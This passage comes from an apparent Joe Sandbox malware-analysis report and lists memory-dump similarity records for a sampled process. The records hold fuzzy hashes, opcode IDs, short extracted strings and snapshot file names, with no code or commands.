                                                                                                                            • Opcode Fuzzy Hash: 889ea4b9790757aaf2e8164202217990ae6b62f6fe6dfd21c8170f255b5600b6
                                                                                                                            • Instruction Fuzzy Hash: BC71D2357242118FDF15EB3AD85A77E7AE6AFC464179C006AE806CB3A0DE74DC82C791
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Xq$Xq$Xq$Xq
                                                                                                                            • API String ID: 0-3965792415
                                                                                                                            • Opcode ID: 17a7e5dc199d71f6b7007d571b24edb136926ff4a027dced8304250bd504ae54
                                                                                                                            • Instruction ID: 3c5ccffbd0b9129667433557f8b86a2b4f6591b71a28889a1d27ad68a04b7300
                                                                                                                            • Opcode Fuzzy Hash: 17a7e5dc199d71f6b7007d571b24edb136926ff4a027dced8304250bd504ae54
                                                                                                                            • Instruction Fuzzy Hash: 94315A71D1031ACBDF74DB6988927AFB6BEAB44310F5844A9C40AA7341DB7089C5CB92
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: \;q$\;q$\;q$\;q
                                                                                                                            • API String ID: 0-2933265366
                                                                                                                            • Opcode ID: 7564de5dab604c4da084bb33762b9c9e682a70ab9ad09cc31efb50aa7cb400e3
                                                                                                                            • Instruction ID: 015f0f54fa046c738ab025e3fb884cdcac41abc14a0f01f4ae7fade9626af39f
                                                                                                                            • Opcode Fuzzy Hash: 7564de5dab604c4da084bb33762b9c9e682a70ab9ad09cc31efb50aa7cb400e3
                                                                                                                            • Instruction Fuzzy Hash: F6014F317201168FC724CA2DC546A29F3EBAFA866076D41AAE407CF374DE71EC818751